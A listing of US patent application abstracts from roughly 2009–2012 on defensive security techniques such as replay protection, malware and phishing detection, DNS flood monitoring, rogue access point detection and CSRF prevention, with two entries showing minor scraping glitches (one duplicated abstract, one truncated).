20120210424System for Efficiently Handling Cryptographic Messages Containing Nonce Values in a Wireless Connectionless Environment Without Comprising Security - A secure communication module that accepts a cryptographic message if a nonce value for the received message is greater than the largest nonce value yet seen. If the received nonce value is not the largest nonce value yet seen, the secure communication module compares the received nonce value with a nonce acceptance window. If the nonce value falls outside the nonce acceptance window, the secure communication module rejects the received message and assumes a replay attack. Alternatively, if the nonce value falls within the nonce acceptance window, the secure communication module compares the received nonce value with a replay window mask. If comparison with the replay window mask indicates that the received nonce value has been seen before, the secure communication module rejects the received message and assumes a replay attack. Otherwise, the secure communication module accepts the message and adds the received nonce value to the replay window mask.08-16-2012
20120210423METHOD AND APPARATUS FOR DETECTING MALICIOUS SOFTWARE THROUGH CONTEXTUAL CONVICTIONS, GENERIC SIGNATURES AND MACHINE LEARNING TECHNIQUES - Novel methods, components, and systems that enhance traditional techniques for detecting malicious software are presented. More specifically, methods, components, and systems that use important contextual information from a client system (such as recent history of events on that system), machine learning techniques, the automated deployment of generic signatures, and combinations thereof, to detect malicious software. The disclosed invention provides a significant improvement with regard to automation compared to previous approaches.08-16-2012
20120159620Scareware Detection - A machine-implemented method for detecting scareware includes the steps of accessing one or more landing pages to be evaluated, extracting one or more features from the landing pages, and providing a classifier to compare the features extracted from the landing pages with features of known scareware and non-scareware pages. The classifier determines a likelihood that the landing page is scareware. If determined to be scareware, the landing page is removed from search results generated by a search engine. The features can be URLs, text, image interest points, image descriptors, a number of pop-ups generated, IP addresses, hostnames, domain names, text derived from images, images, metadata, identifiers of executables, and combinations thereof.06-21-2012
20120159623METHOD AND APPARATUS FOR MONITORING AND PROCESSING DNS QUERY TRAFFIC - A method for monitoring and processing domain name system (DNS) query traffic includes: monitoring DNS query traffic in each time slot during a monitoring period comprised of n number of time slots; extracting traffic information during the monitoring period by using the DNS query traffic monitored in said each time slot; and analyzing the extracted traffic information to detect a DNS traffic flooding attack.06-21-2012
20120159622METHOD AND APPARATUS FOR GENERATING ADAPTIVE SECURITY MODEL - A method for generating an adaptive security model includes: generating an initial security model with respect to data input via an Internet during a learning process; and continuously updating the initial security model by applying characteristics of the input data during an online process. Said generating an initial security model includes: matching the input data with a unit having a weight vector with distance closest to the input data using a first unsupervised algorithm; generating a map composed of weight vectors of units; and performing a second unsupervised algorithm using the weight vectors forming the map as input values to partition an attack cluster.06-21-2012
20120159621DETECTION SYSTEM AND METHOD OF SUSPICIOUS MALICIOUS WEBSITE USING ANALYSIS OF JAVASCRIPT OBFUSCATION STRENGTH - The present invention provides a detection system of a suspicious malicious website using the analysis of a JavaScript obfuscation strength, which includes: an entropy measuring block of measuring an entropy of an obfuscated JavaScript present in the website, a special character entropy, and a variable/function name entropy; a frequency measuring block of measuring a specific function frequency, an encoding mark frequency and a % symbol frequency of the JavaScript; a density measuring block of measuring the maximum length of a single character string of the JavaScript; and a malicious website confirming block of determining whether the relevant website is malicious by comparing an obfuscation strength value, measured by the entropy measuring block, the frequency measuring block and the density measuring block, with a threshold value.06-21-2012
20120072986METHODS FOR DETECTING AND CLASSIFYING SIGNALS TRANSMITTED OVER A RADIO FREQUENCY SPECTRUM - A method for classifying a signal is disclosed. The method can be used by a station or stations within a network to classify the signal as non-cooperative (NC) or a target signal. The method performs classification over channels within a frequency spectrum. The percentage of power above a first threshold is computed for a channel. Based on the percentage, a signal is classified as a narrowband signal. If the percentage indicates the absence of a narrowband signal, then a lower second threshold is applied to confirm the absence according to the percentage of power above the second threshold. The signal is classified as a narrowband signal or pre-classified as a wideband signal based on the percentage. Pre-classified wideband signals are classified as a wideband NC signal or target signal using spectrum masks.03-22-2012
20120072985MANAGING SERVICES IN A CLOUD COMPUTING ENVIRONMENT - What is provided are a system and method which enables an organization or user to manage computational services in a cloud computing network for security, compliance and governance. The management including creating a trusted virtual network including encrypted data storage, encrypted data transport, and trusted instances of servers all communicatively coupled together forming a trusted cloud computing environment that is associated with the organization. A web portal running on a web server provides a point of access to the cloud computing environment. A workflow is accessed to implement one or more policies in trusted computing environment to manage the trusted cloud computing environment, the workflow customized to the organization. The access control; and to the trusted cloud computing environment is used to ensure access by users authorized by the organization to ensure compliance with adopted standards.03-22-2012
20090300759ATTACK PREVENTION TECHNIQUES - Techniques for detecting and responding to attacks on computer and network systems including denial-of-service (DoS) attacks. A packet is classified as potentially being an attack packet if it matches an access control list (ACL) specifying one or more conditions. One or more actions may be performed responsive to packets identified as potential attack packets. These actions may include dropping packets identified as potential attack packets for a period of time, rate limiting a port over which the potential attack packets are received for a period of time, and other actions.12-03-2009
20120124665METHOD AND APPARATUS FOR DETECTING A ROGUE ACCESS POINT IN A COMMUNICATION NETWORK - A method and apparatus for detecting a rogue access point in a communication network is described herein. The method includes a probing unit sending a pre-detection message to an associated access point in the communication network. The pre-detection message indicates a start of rogue access point detection mode and informs the associated access point not to respond to probe requests following the pre-detection message. The method further includes the probing unit broadcasting probe requests in the communication network. The probing unit detect that one or more of the plurality of access points is the rogue access point based on receiving a probe response in reply to the broadcasted probe request from the rogue access point. A method for detecting a rogue access point includes broadcasting a probe request with a proprietary information bit and detecting the rogue access point based on receiving a probe response for the broadcasted probe request.05-17-2012
20120124664DIFFERENTIATING BETWEEN GOOD AND BAD CONTENT IN A USER-PROVIDED CONTENT SYSTEM - A system differentiates good content from bad content in a user-provided content system. Messages are analyzed for features that characterize messages. A feature may occur in one or more messages. A feature that has more than a threshold number of occurrences in messages in a time interval is identified for further analysis. Enhanced authentication is requested from senders of the messages with occurrences of the identified feature. Based on the rate at which senders of the messages pass authentication, the content associated with the message is determined to be good content or bad content. Subsequent messages are blocked or successfully delivered based on whether features occurring in the messages are indicative of good content or bad content.05-17-2012
20110107420LOCATOR CODING IN A COMMUNICATIONS NETWORKS - A method for use in interconnected communications networks, comprising negotiating a locally unique interface identifier between a network entity and a network such that the locally unique interface identifier differs from any interface identifier used by either of the network entity and the network; and using the locally unique interface identifier to identify an egress interface from the network entity to the network, and using the locally unique interface identifier to identify an egress interface from the network to the network entity. By using a common locally unique interface identifier between networks and network entities on a path between a source or destination network entity and a core network, a globally unique locator for the source or destination network entity can be constructed by concatenating elements derived from a plurality of negotiated common local interface identifiers between networks and network entities on the path.05-05-2011
20110107418DETECTING ANOMALIES IN ACCESS CONTROL LISTS - An access control anomaly detection system and method to detect potential anomalies in access control permissions and report those potential anomalies in real time to an administrator for possible action. Embodiments of the system and method input access control lists and semantic groups (or any dataset having binary matrices) to perform automated anomaly detection. This input is processed in three broad phases. First, policy statements are extracted from the access control lists. Next, object-level anomaly detection is performed using thresholds by categorizing outliers in the policies discovered in the first phase as potential anomalies. This object-level anomaly detection can yield object-level security anomalies and object-level accessibility anomalies. Group-level anomaly detection is performed in the third phase by using semantic groups and user sets extracted in first phase to find maximal overlaps using group mapping. This group-level anomaly detection can yield group-level security anomalies and group-level accessibility anomalies.05-05-2011
20110107417Detecting AP MAC Spoofing - Detecting access point MAC spoofing in a wireless digital network. A sensor in a wireless digital network learns the MAC address and operating channel for at least one access point. If the sensor detects frames being sent to a MAC address on a channel other than the channel associated with that MAC address, then the access point associated with the MAC address is being spoofed. These frames may be association frames, or data frames. If the sensor is running as part of an access point the sensor also knows what clients are associated with the access point. If the sensor detects frames indicating association, such as data frames, sent to its MAC address, but the client is not associated with the access point, then the access point is being spoofed. Similarly, if the sensor receives frames on a channel other than that associated with the access point and receives traffic for the access point's MAC address, the access point is being spoofed. The sensor may be a separate device on the wireless network, or may be functionality included in one or more access points on the network.05-05-2011
20110107419SYSTEMS AND METHODS FOR IMPROVED IDENTIFICATION AND ANALYSIS OF THREATS TO A COMPUTING SYSTEM - A security tool can access a tagging tool and the history generated by the tagging tool in order to identify potential threats and analyze the identified threats. When a potential threat is detected or an actual threat is identified, the security tool can request the history of actions from the tagging tool corresponding to the threat. The security tool can compare the potential or actual threat with the history of any action recorded by the tagging tool in order to classify a potential threat as an actual threat or determine the source or cause of an actual threat.05-05-2011
20100095376SOFTWARE WATERMARKING - Various techniques for uniquely marking software, such as by reference to hidden information or other telltale features, are detailed. Some marks are evident in static code. Others are observable when the code is executed. Some do not manifest themselves until the code is exercised with specific stimulus. Different of the techniques are applicable to source code, object code, and firmware. A great number of other features and arrangements are also disclosed.04-15-2010
20100095378Classifying a Message Based on Fraud Indicators - Systems, methods, and media for classifying messages are disclosed. A plurality of fraud indicators are identified in the message. A signature of the message is generated. The generated signature of the message is compared to a stored signature. The stored signature is based on a statistical analysis of fraud indicators in a second message associated with the stored signature. A determination as to whether the message is fraudulent is made based on the comparison. The message is processed based on the determination that the message is a fraudulent message.04-15-2010
20100095377DETECTION OF SUSPICIOUS TRAFFIC PATTERNS IN ELECTRONIC COMMUNICATIONS - Methods and systems for detecting suspicious traffic patterns in electronic communications are provided. According to one embodiment, an electronic mail (email) message is received by a mail filter (milter), which evaluates a traffic pattern represented by the email message by scanning information associated with the email message and comparing it to information associated with one or more traffic analysis profiles. If the email message is identified by the milter as being inconsistent with normal email traffic patterns as represented by the one or more traffic analysis profiles, then the milter causes the email message to be handled in accordance with an email security policy associated with suspicious traffic patterns. For example, in the context of an outbound message, the originator may be alerted to a factor contributing to the identification and the originator may be provided with an opportunity to address the factor.04-15-2010
20100095375Method for locating fraudulent replicas of web sites - A method for detecting Web sites used for phishing, including preselecting one or more Web sites to be examined for duplication, selecting at least one or more elements that are present in the preselected Web site and that relate to characteristic identifying features of the preselected Web site, forming at least one search query using the one or more elements, and submitting the at least one search query to an indexed public search engine. The elements illustratively may be URL substrings, content identification substrings, or tree structure-related substrings. A report of Web sites using the selected one or more search terms is received from the public search engine in response to the query, and the preselected Web site is eliminated from the Web sites found in the search. The remaining Web sites retrieved in the search are further analyzed, by additional focused searching of the retrieved pages, by comparing header or tree structure information, or other techniques to compare them with the preselected Web site to identify unauthorized near-replicas of the known legitimate Web site for responsive action.04-15-2010
20100095374GRAPH BASED BOT-USER DETECTION - Computer implemented methods are disclosed for detecting bot-user groups that send spam email over a web-based email service. Embodiments of the present system employ a two-prong approach to detecting bot-user groups. The first prong employs a historical-based approach for detecting anomalous changes in user account information, such as aggressive bot-user signups. The second prong of the present system entails constructing a large user-user relationship graph, which identifies bot-user sub-graphs through finding tightly connected subgraph components.04-15-2010
20110099630SYSTEM AND METHOD FOR PROTECTING COMMUNICATION DEVICES FROM DENIAL OF SERVICE ATTACKS - A system for preventing successful denial of service attacks comprises a first communication device, a second communication device, and a network. The first and second communication devices establish a communication session via the network. Based on various information, such as a pre-shared secret, one of the communication devices determines a network access filter value and compares this value to at least one data frame in order to authenticate such data frame without committing significant computing resource and any memory space. By updating the network access filter over time, an unauthorized user who discovers the outdated network access filter values is prevented from successfully launching a denial of service attack.04-28-2011
20110099629AUTHENTICATING A WEB PAGE WITH EMBEDDED JAVASCRIPT - A method for detecting if a digital document (e.g. an HTML document) is changed by others than authenticated script code (e.g. JavaScript code) is presented. The method comprises loading the authenticated script code into a trusted computer application and storing a snapshot of the digital document in the trusted computer application. Before the authenticated script code is executed, the snapshot of the digital document is compared with the document to verify if the digital document is still authentic. After executing the authenticated script code, the snapshot of the digital document is replaced with an up-to-date copy reflecting eventual changes made to the digital document by the executed script code. The digital document can then at any time be compared with the most recent snapshot to verify if it is authentic.04-28-2011
20110099628METHOD AND SYSTEM FOR WEIGHTING TRANSACTIONS IN A FRAUD DETECTION SYSTEM - A method of computing a similarity between a first transaction having a set of properties and a second transaction having the set of properties includes computing an initial weight for each of the properties of the set of properties and computing a similarity between each of the properties of the first transaction and the properties of the second transaction. The method also includes adjusting the initial weight for each of the properties based on a measure of the commonness of each of the properties of the set of properties, normalizing the adjusted weights, and computing the similarity by summing the products of the normalized adjusted weights and the computed similarities.04-28-2011
20090133121Method for processing messages and message processing device - A message processing device for processing messages has at least one reception buffer, a message includes at least one authentication element and one message content. The message is received and stored in the reception buffer. A characteristic variable of a priority for security checking of the message is determined as a function of the message content. A processing sequence for further message processing for the security checking, taking into account the at least one authentication element of the messages in the reception buffer is defined and carried out as a function of the characteristic variable.05-21-2009
20120222110DATA LEAKAGE PROTECTION IN CLOUD APPLICATIONS - A computer-implemented method for data leakage protection is disclosed. A monitoring template corresponding to the cloud application is selected based upon communication between a user and a cloud application and from a plurality of monitoring templates. A monitor is generated using the selected monitoring template. Identifying information of content shared between the user and the cloud application is obtained using the generated monitor. Data about the shared content for security analysis is obtained according to the identifying information of the shared content.08-30-2012
20120222114METHOD AND APPARATUS FOR NETWORK FILTERING AND FIREWALL PROTECTION ON A SECURE PARTITION - A management virtual machine on a virtualization technology enabled platform includes a means for providing a firewall and deep packet inspection. An isolated secure partition is provided to host the management application and network packet filtering and firewall functions to provide a secure and trusted platform for manageability applications. A protected component in the operating system in a user partition moves network traffic to the secure partition for inspection and filtering.08-30-2012
20120272316METHOD FOR DETECTING THE HIJACKING OF COMPUTER RESOURCES - The present invention provides a method for detecting the hijacking of computer resources, located on an internal network implementing security and confidentiality criteria specific to this internal network, connected to an external network with no such security and confidentiality criteria, through a connection managed by a service provider, comprising: 10-25-2012
20120317641PEER-TO-PEER (P2P) BOTNET TRACKING AT BACKBONE LEVEL - A method, computer-readable medium, and system for analyzing backbone traffic to determine compromised hosts from among hosts on a network are provided. The backbone traffic includes data flows. Each of the data flows is analyzed to determine peer-to-peer data flows from among the data flows. Each of the peer-to-peer data flows is one of the data flows having a source address and a destination address that are each unassociated with a domain name. The peer-to-peer data flows are analyzed to determine the compromised hosts from among the hosts. Each of the compromised hosts is interconnected with another of the compromised hosts via at least one of the peer-to-peer data flows.12-13-2012
20120317643APPARATUS AND METHOD PREVENTING OVERFLOW OF PENDING INTEREST TABLE IN NAME BASED NETWORK SYSTEM - A node apparatus and method are described to prevent overflow of a pending interest table (PIT) in a name based network system. The node apparatus and method increases a number of PITs to correspond to a number of interface units so that the PITs match the interface units, respectively, and stores a request message flowing in per interface unit in the matching PITs. In addition, when a capacity used at each of the PITs exceeds a threshold, the node apparatus and method transmits a traffic control message for traffic control through respectively matching interface units to prevent overflow of the PITs.12-13-2012
20120131669Determining whether method of computer program is a validator - An illegal pattern and a computer program having a method are received. The method has one or more return statements, and a number of basic blocks. The method is normalized so that each return statement of the target method relating to the illegal pattern returns a constant Boolean value. A first path condition and a second path condition for one or more corresponding paths is determined such that one or more corresponding basic blocks return a constant Boolean value of true for the first path condition and a constant Boolean value of false for the second path condition. An unsatisfiability of each path condition is determined using a monadic second-order logic (M2L) technique. Where the unsatisfiability of either path condition is false, the method is reported as not being a validator. Where the unsatisfiability of either path condition is true, the method is reported as being a validator.05-24-2012
20120131668Policy-Driven Detection And Verification Of Methods Such As Sanitizers And Validators - A method includes performing a static analysis on a program having sources and sinks to track string flow from the sources to the sinks. The static analysis includes, for string variables in the program that begin at sources, computing grammar of all possible string values for each of the string variables and, for methods in the program operating on any of the string variables, computing grammar of string variables returned by the methods. The static analysis also includes, in response to one of the string variables reaching a sink that performs a security-sensitive operation, comparing current grammar of the one string variable with a policy corresponding to the security-sensitive operation, and performing a reporting operation based on the comparing. Apparatus and computer program products are also disclosed.05-24-2012
20120131671Securing An Access Provider - To secure an access provider, communications to/from the access provider are monitored for a partially-completed connection transaction. Detected partially-completed connection transactions are terminated when they remain in existence for a period of time that exceeds a threshold period of time. The monitoring may include detecting partially-completed connection transactions initiated by an access requestor, measuring the period of time that a partially-completed connection transaction remains in existence, comparing the period of time with the threshold period of time, and resetting a communication port located on the access provider.05-24-2012
20120131670Global Variable Security Analysis - A method includes determining selected global variables in a program for which flow of the selected global variables through the program is to be tracked. The selected global variables are less than all the global variables in the program. The method includes using a static analysis performed on the program, tracking flow through the program for the selected global variables. In response to one or more of the selected global variables being used in security-sensitive operations in the flow, use is analyzed of each one of the selected global variables in a corresponding security-sensitive operation. In response to a determination the use may be a potential security violation, the potential security violation is reported. Apparatus and computer program products are also disclosed.05-24-2012
20120167213SAFE FILE TRANSMISSION AND REPUTATION LOOKUP - A method of safe file transmission and reputation lookup is provided. As a part of the safe file transmission and reputation lookup methodology, a data file that is to be made available to a data file receiver is accessed and it is determined whether the data file needs to be provided a protective file. The data file is wrapped in a protective file to create a non-executing package file. Access is provided to the non-executing package file where the associated data file is prevented from being executed until data file reputation information is received.06-28-2012
20120167210METHOD AND SYSTEM FOR ESTIMATING THE RELIABILITY OF BLACKLISTS OF BOTNET-INFECTED COMPUTERS - A system and a method for determining the reliability of blacklists is disclosed. Each blacklist comprises IP addresses of supposedly infected computers. The reliability is computed by analyzing whether the blacklist reports or not controlled infections from sandboxed environments and by measuring the elapsed time between reported infections and disinfections. The obtained information is then used in combination with several metrics for determining the trustworthiness of the IP address of a given Internet host that requests an online transaction with the purpose of granting or denying access to a service.06-28-2012
20120167209AUTOMATIC CONTEXT-SENSITIVE SANITIZATION - An automatic context-sensitive sanitization technique detects errors due to the mismatch of a sanitizer sequence with a browser parsing context. A pre-deployment analyzer automatically detects violating paths that contain a sanitizer sequence that is inconsistent with a browsing context associated with outputting an untrusted input. The pre-deployment analyzer determines a correct sanitizer sequence which is stored in a sanitization cache. During the runtime execution of the web application, a path detector tracks execution of the web application in relation to the violating paths. The correct sanitizer sequence can be applied when the runtime execution follows a violating path.06-28-2012
20120167208SYSTEM AND METHOD FOR VOIP HONEYPOT FOR CONVERGED VOIP SERVICES - Disclosed herein are systems, methods, and computer-readable storage media for a honeypot addressing cyber threats enabled by convergence of data and communication services in an enterprise network. Suspicious incoming VoIP calls from the Internet to the enterprise network are intercepted and directed to a VoIP honeypot that acts as a network decoy and responds automatically during call sessions for the suspicious incoming VOIP calls while tracing the suspicious incoming VOIP calls. Suspicious outgoing VoIP calls from the enterprise network to the Internet are also intercepted and directed to the VoIP honeypot. Moreover, an unsolicited VoIP call is redirected to the VoIP honeypot when the unsolicited VoIP call has been received by a user agent in the enterprise network and a human user of the user agent confirms that the unsolicited VoIP call was unsolicited.06-28-2012
20120167207Unauthorized Location Detection and Countermeasures - A location sentry system is provided for use within a mobile device. The sentry system can be configured to detect unauthorized attempts to locate mobile devices by monitoring messages passed between the mobile device and the wireless network and/or messages passed between components of the mobile device, and determining that one or more of the messages is/are indicative of an attempt to locate the mobile device. In response to a determination that an unauthorized attempt has been detected, the location sentry can be configured to take one or more actions. For example, the location sentry system could prevent location information from being sent back to the wireless network and/or the location sentry system could cause incorrect information to be sent to the wireless network.06-28-2012
20120167206SYSTEM AND METHOD FOR ENABLING SECURE DISPLAY OF EXTERNAL IMAGES - A system and method for securely displaying to a user images retrieved from an external image source. Upon the request for a product catalog by the user via a user interface a backend retrieves images for the product catalog from external image sources and converts the retrieved images to render inoperable potentially malicious code embedded in the images. The converted images may then be used in the product catalog displayed to the user via the user interface. In an embodiment, the frontend compiles the product catalog and requests images from the backend. Product catalog information may be stored in a database implemented at the backend.06-28-2012
20120216279Backward researching time stamped events to find an origin of pestware - A system and method for identifying an origin of suspected pestware activity on a computer is described. One embodiment includes establishing a time of interest relating to a suspicion of pestware on the computer; issuing a timestamp in response to the establishing the time of interest; identifying, in response to the issuing the timestamp, indicia of pestware; and accessing at least a portion of a recorded history of sources that the computer received files from so as to identify, based at least in part upon the identified indicia of pestware, a reference to an identity of a source that is suspected of originating pestware.08-23-2012
20120254998METHOD FOR BLOCKING THE EXECUTION OF A HACKING PROCESS - The present invention discloses a method of blocking the execution of a hacking process. In the method, a security process selects a process to be tested. The security process extracts the pattern of the process to be tested and compares it with hack diagnosis references. If the pattern of the process to be tested is included in the hack diagnosis references, the security process determines that the process to be tested is a hacking process. The security process calculates the unique hash value of the hacking process and compares it with hack blocking references. If the unique hash value of the hacking process is included in the hack blocking references, the security process blocks the execution of the hacking process, and, if the unique hash value of the hacking process is not included in the hack blocking references, the security process does not block the execution of the hacking process.10-04-2012
20120254996DNS RESOLUTION, POLICIES, AND VIEWS FOR LARGE VOLUME SYSTEMS - Systems and methods for resolving domain name system (DNS) queries are provided herein. Methods may include receiving a DNS query from a DNS client via a DNS server, responsive to the DNS query, generating the DNS response utilizing the at least one policy associated with the view, providing the DNS response to the DNS client from which the DNS query was received, and storing the DNS response in a shared cache, the shared cache including previously generated DNS responses that are available to the DNS server, wherein previously generated DNS responses may be provided to DNS clients upon receiving a DNS query corresponding to at least one of the previously generated DNS responses.10-04-2012
20120254994SYSTEM AND METHOD FOR MICROCODE BASED ANTI-MALWARE SECURITY - A system for securing an electronic device includes a processor comprising microcode, a resource coupled to the processor, and a microcode security agent embodied the microcode. The microcode security agent is configured to intercept a communication and determine whether the communication is indicative of malware. The communication includes a request made of the resource or information generated from the resource.10-04-2012
20120137364REMOTE ATTESTATION OF A MOBILE DEVICE - Secure services and hardware on a mobile device are disabled if it is detected that software in the untrusted domain, such as the operating system, has been hacked or tampered with. Mobile devices often have rich, unprotected operating systems which are vulnerable to hacking, especially from execution of one or more apps. These apps are separated from secure services on the device, such as e-wallet services, NFC functionality, camera, enterprise access, and the like, and the present invention ensures that tampering with code in the untrusted domain or operating system does not affect these and other secure services. If tampering in the untrusted space is detected, the secure services and possible hardware on the device are shutdown or disabled. The extent of this disablement may depend on various factors, such as use of the device, type of device, context in which device is used (e.g., military, enterprise).05-31-2012
20120137363Method and Device for Preventing CSRF Attack - The disclosure provides a device and method for preventing CSRF attacks, in which the method comprises: intercepting request sent from a client browser to a server; generating a token; generating a response to the request; inserting the token into the response to the request; and sending the response to the request to the client browser with the token inserted into the response. With the method and device of the disclosure, it is assured that a token is inserted into all the requests made by a user through a client browser for accessing a resource. And it can be assured that the request is issued by the user himself by verifying whether the token in the request is valid, thereby preventing a CSRF attack.05-31-2012
20120137362COLLABORATIVE SECURITY SYSTEM FOR RESIDENTIAL USERS - The invention relates to a collaborative system for security information exchange between users, based on the fact that a determined function (whether storing or processing) is spread out at different points of a network to achieve more scalable processing and storing factors than if they were all done at one and the same point.05-31-2012
20110185421SYSTEM AND METHOD FOR NETWORK SECURITY INCLUDING DETECTION OF MAN-IN-THE-BROWSER ATTACKS - A method is performed in a network security system implemented in a computer or electronic device that is coupled to secured online resources for detecting unauthorized accesses of those secured online resources. The method includes monitoring a user activity session. It is determined whether the user activity session is indicative of a hidden session by an attacker, where the determination includes comparing the user activity session to an average user activity session.07-28-2011
20110185420DETECTION METHODS AND DEVICES OF WEB MIMICRY ATTACKS - A web mimicry attack detection device is provided, including: a first token sequence collector receiving a hypertext transfer protocol request and extracting string content of the hypertext transfer protocol request according to a token collection method to generate a token sequence corresponding to the hypertext transfer protocol request, wherein the token sequence comprises a plurality of the tokens; and a mimicry attack detector generating a label and a confidence score corresponding individually to the tokens according to the tokens and a conditional random field probability model, summing the confidence score individually corresponding to the tokens in the token sequence by a summary rule to generate a summary confidence score, and determining whether the hypertext transfer protocol request is an attack according to the summary confidence score and the label individually corresponding to the tokens.07-28-2011
20110185419METHOD AND APPARATUS FOR DETECTING SSH LOGIN ATTACKS - A digital filter correlation engine, wherein the correlation engine combines N arbitrary digital filter states based on the weights and along with a threshold generate a network incident. This network incident in turn can be feedback to another digital filter. This multi-layering capability allows the creation of higher level event detections that are time-based for a cyber security analyst to analyze, thereby reducing the amount of manual work the analyst has to do in inspecting behaviors within the network.07-28-2011
20110185418DIGITAL FILTER CORRELATION ENGINE - A digital filter correlation engine, wherein the correlation engine combines N arbitrary digital filter states based on the weights and along with a threshold generate a network incident. This network incident in turn can be feedback to another digital filter. This multi-layering capability allows the creation of higher level event detections that are time-based for a cyber security analyst to analyze, thereby reducing the amount of manual work the analyst has to do in inspecting behaviors within the network.07-28-2011
20110185417Memory Whitelisting - An enhanced whitelisting module associated within a system whitelists unknown files for execution on the system. The whitelisting module may oversee the computation of a hash of a file loaded into the memory and comparison of the hash to hashes within a hash table generated from clean files located on a clean system. The whitelisting module may communicate to a device internal and/or external to the system to retrieve the hash table of clean files. In certain embodiments, a rolling hash (or other piecewise hash) may be used to determine the location and/or extent of the differences between a modified file and a clean file.07-28-2011
20100186086METHODS FOR INSPECTING SECURITY CERTIFICATES BY NETWORK SECURITY DEVICES TO DETECT AND PREVENT THE USE OF INVALID CERTIFICATES - Disclosed are methods and media for inspecting security certificates. Methods include the steps of: scanning, by a network security device, messages of a security protocol between a server and a client system; detecting the messages having a security certificate; detecting suspicious security certificates from the messages; and aborting particular sessions of the security protocol associated with the suspicious certificates. Preferably, the step of scanning is performed only on messages of server certificate records. Preferably, the method further includes the step of: sending an invalid-certificate notice to the server and the client system. Preferably, the step of detecting the suspicious certificates includes detecting a use of an incorrectly-generated private key for the certificates. Preferably, the step of detecting the suspicious certificates includes detecting an unavailability of revocation information for the certificates. Preferably, the step of detecting the suspicious certificates includes detecting a use of an invalid cryptographic algorithm for the certificates.07-22-2010
20100175131METHOD AND SYSTEM FOR NETWORK PROTECTION AGAINST CYBER ATTACKS - A method, system, and device for protecting networking computers or devices from cyber attacks, including periodically changing cyber coordinates of a communications network or system; communicating the changed cyber coordinates to corresponding or reciprocal networks and/or devices so they can maintain communications; detecting a cyber attack or receiving notification from the corresponding or reciprocal networks and/or devices of a cyber attack; and changing the cyber coordinates of the network or system upon such detection or notification and communicating the changed cyber coordinates to the corresponding or reciprocal networks and/or devices.07-08-2010
20100175130Pattern-Recognition Processor with Matching-Data Reporting Module - Disclosed are methods and devices, among which is a device that includes a pattern-recognition processor. The pattern-recognition processor may include a matching-data reporting module, which may have a buffer and a match event table. The buffer may be coupled to a data stream and configured to store at least part of the data stream, and the match event table may be configured to store data indicative of a buffer location corresponding with a start of a search criterion being satisfied.07-08-2010
20100287613SANITIZATION OF PACKETS - Methods, systems, and computer-readable media are disclosed for packet sanitization. A particular method intercepts a packet of a packet stream, where the packet stream is transmitted in accordance with a particular protocol. The packet is analyzed based on a specification associated with the particular protocol. Based on the analysis, a data value of a field of the packet is replaced with a sanitized data value to create a sanitized packet. The sanitized packet may be injected into the packet stream or may optionally be forwarded to a signature module that checks the sanitized packet for malicious content. When malicious content is found, the sanitized packet may be dropped, the sanitized packet may be logged, the sanitized packet may be redirected, or a notification regarding the sanitized packet may be sent to an administrator.11-11-2010
20120174219IDENTIFYING MOBILE DEVICE REPUTATIONS - Methods and systems for operation upon one or more data processors for assigning a reputation to a messaging entity by analyzing the attributes of the entity, correlating the attributes with known attributes to define relationships between entities sharing attributes, and attributing a portion of the reputation of one related entity to the reputation of the other related entity.07-05-2012
20120174218Network Communication System With Improved Security - A computer network communication method and system wherein software rendering software is interposed in the data communication path between a browser running on a user computer and the internet data sources (for example, internet-accessible server computers) that the user browser wants to receive information from. The software rendering application gets data from internet data sources, but this data may contain malware. To provide enhanced security, the software rendering application renders this data to form a new browser readable code set (for example, an xml page with CSS layers), and this new and safe browser readable code set is sent along to the browser on the user computer for appropriate presentation to the user. As part of the rendering process, dedicated and distinct virtual machines may be used to render certain portion of the data, such as executable code. These virtual machines may be watched, and quickly destroyed if it is detected that they have encountered some type of malware.07-05-2012
20120174217NETWORK SECURITY MANAGEMENT - A method may include receiving session control messages and counting the session control messages of a same type having a same transaction identifier (ID). The method may further include blocking the session control messages of the same type having the same transaction ID when the count exceeds a threshold number. The method may further include determining whether the blocked session control messages are associated with an anomalous event and, when the blocked session control messages are not associated with the anomalous event, increasing the threshold number.07-05-2012
20120174216SECURITY PROTOCOL PROCESSING FOR ANTI-REPLAY PROTECTION - Described embodiments provide a network processor that includes a security protocol processor to prevent replay attacks on the network processor. A memory stores security associations for anti-replay operations. A pre-fetch module retrieves an anti-replay window corresponding to a data stream of the network processor. The anti-replay window has a range of sequence numbers. When the network processor receives a data packet, the security hardware accelerator determines a value of the received sequence number with respect to minimum and maximum values of a sequence number range of the anti-replay window. Depending on the value, the data packet is either received or accepted. The anti-replay window might be updated to reflect the receipt of the most recent data packet.07-05-2012
20120317642Parallel Tracing Apparatus For Malicious Websites - An apparatus and system for scoring and grading websites and method of operation. An apparatus receives one or more Uniform Resource Identifiers (URI), requests and receives a resource such as a webpage, and observes the behaviors of a commercial browser operating within a commercial operating system over a multi-core processor having hardware containing virtualization extensions. The apparatus records and stores objects and packets captured while the browser is controlled by software received from a server accessed via the URI.12-13-2012
20110191848PREVENTING MALICIOUS JUST-IN-TIME SPRAYING ATTACKS - A method disclosed herein includes acts of receiving code at a Just-in-Time compiler executing in an application on a computing device and compiling the code to generate machine code and causing the machine code to be placed on at least one page that is accessible by at least one processor on the computing device, wherein the Just-in-Time compiler compiles the code utilizing at least one technique for preventing a Just-in-Time spraying attack.08-04-2011
20110191847ACTIVITY FILTERING BASED ON TRUST RATINGS OF NETWORK ENTITIES - The filtering of activities generated by nodes of a network while interacting with a device may be performed by evaluating the desirability of the activities (e.g., a spam or not-spam determination of email messages sent by the node) and assigning a trust rating to the node. However, nodes are often identified by network address, and an operator of a node sending undesirable activities may reassign the network address of the node in order to avoid heavy filtering. Instead, nodes may be identified as being controlled by a network entity (e.g., an autonomous system identified in a border gateway protocol routing table.) The network entity is assigned a network entity trust rating based on the trust ratings of the nodes controlled thereby, and an appropriate level of activity filtering based on the network entity trust rating may be selected for subsequent activities received from all nodes controlled by the network entity.08-04-2011
20120222113Logical Partition Media Access Control Impostor Detector - Provided are techniques for to enable a virtual input/output server (VIOS) to establish cryptographically secure signals with target LPARs to detect an imposter or spoofing LPAR. The secure signal, or “heartbeat,” may be configured as an Internet Key Exchange/Internet Protocol Security (IKE/IPSec) encapsulated packet (ESP) connection or tunnel. Within the tunnel, the VIOS pings each target LPAR and, if a heartbeat is interrupted, the VIOS makes a determination as to whether the tunnel is broken, the corresponding LPAR is down or a media access control (MAC) spoofing attach is occurring. The determination is made by sending a heartbeat that is designed to fail unless the heartbeat is received by a spoofing device.08-30-2012
